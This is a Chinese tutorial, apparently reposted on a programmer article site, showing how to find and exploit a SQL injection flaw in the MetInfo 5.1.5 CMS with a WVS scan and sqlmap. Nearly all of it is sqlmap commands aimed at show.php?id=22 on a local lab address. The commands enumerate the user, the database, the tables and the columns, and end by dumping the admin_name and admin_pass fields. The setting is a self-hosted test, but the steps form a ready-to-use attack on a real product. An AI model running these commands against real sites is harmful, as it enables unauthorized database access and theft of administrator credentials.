欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

程序员文章站 2022-07-08 14:26:23
上次叉叉讲了Sqlmap简单注入(access数据库)教程,这次咱说说MySql数据库 MetInfo,是一款强大的企业网站管理系统,采用PHP+Mysql架构。   叉叉下载...
上次叉叉讲了Sqlmap简单注入(access数据库)教程,这次咱说说MySql数据库

MetInfo,是一款强大的企业网站管理系统,采用PHP+Mysql架构。

 

叉叉下载的是MetInfo 5.1.5的免费版本,咱不是大拿,不会分析源码,直接丢到WVS里面扫

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

发现注入点,打开我们的backtrack5,运行Sqlmap神器

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

获取当前用户名称,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-user

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

获取当前数据库名称,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-db

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

得到数据库名为:met

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

列数据库表名,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –tables -D “met“成功得到”met”数据库的表名如下图:

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

列admin表的字段,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –columns  -T “met_admin_table“ -D “met”

利用Sqlmap测试MetInfo企业网站管理系统MySql注入

上图显示成功获取met_admin_table表的字段,下面dump出admin_name和admin_pass内容,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”